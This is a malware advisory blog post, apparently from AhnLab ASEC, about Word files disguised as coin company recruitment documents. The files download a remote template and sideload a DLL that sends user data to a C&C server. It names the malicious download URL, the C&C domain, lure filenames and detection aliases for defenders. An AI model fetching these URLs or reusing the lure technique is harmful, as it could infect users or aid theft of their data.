Distribution of Malware Using Word File Disguised as Coin Company Recruitment Table Document

On May 8, AhnLab ASEC analysis team uploaded a post that shed some light on distribution of malware that stole certificate of a Korean gaming company. Since then, AhnLab ASEC confirmed distribution of malware of the same type that went through some modifications. These files are using a variety of filenames, and further information will be explained below.

Like the case introduced in the previous blog post, this malware used the recruitment table of a coin company.

Furthermore, the attacker used ‘adjusted details’ as the title to prompt users who are curious about the details to open the document file. Judging by this behavior, it is highly likely that the attacker is distributing the file using different titles to in certain organizations.

• Titles of distributed documents
  
  – **news reorganization details.docx
  
  – PAYS reorganization.docx
  
  – **bit new employee application template.docx

The execution flow of this document is the same as the previous method. It attempts to connect to network from the original document to an additional document, and the final malicious DLL is activated via a document file received at this time.

• Download URL for the changed connecting document
  
  – https://products-msofficeclient.office.microsoft.office-microsoft.cc/officeDocument/office-word.dotm

While the previous attack had a connected document containing malware within it to create the file, the attack this time downloads the file via an external network. As shown in the VBA code below, downloading link uses a random value as the end id value of a certain URL.

DLL activated in the end is created as msedgeupdate.dll as before, and is loaded to a normal MicrosoftEdgeUpdate.exe file where it runs. The C&C address that DLL connects to is changed as below, and it performs the task of sending user info. It is speculated that the file will receive additional data in the future.

• Changed C&C address
  
  – https://han.naver2020.me

Moreover, the DLL is still misusing a certificate of a major Korean company that it stole.

Given that the malware of this type is continually attacking the cryptocurrency market, media press, and IT companies, users must refrain from opening document files with unknown sources and remain vigilant to avoid damage.

AhnLab’s anti-malware product V3 detects the malicious document file and the DLL file using the aliases below.

• Downloader/XML.Generic (2020.05.14.04)
• Dropper/DOC.Generic (2020.05.14.04)
• Trojan/Win32.Agent.C4085977 (2020.05.04.05)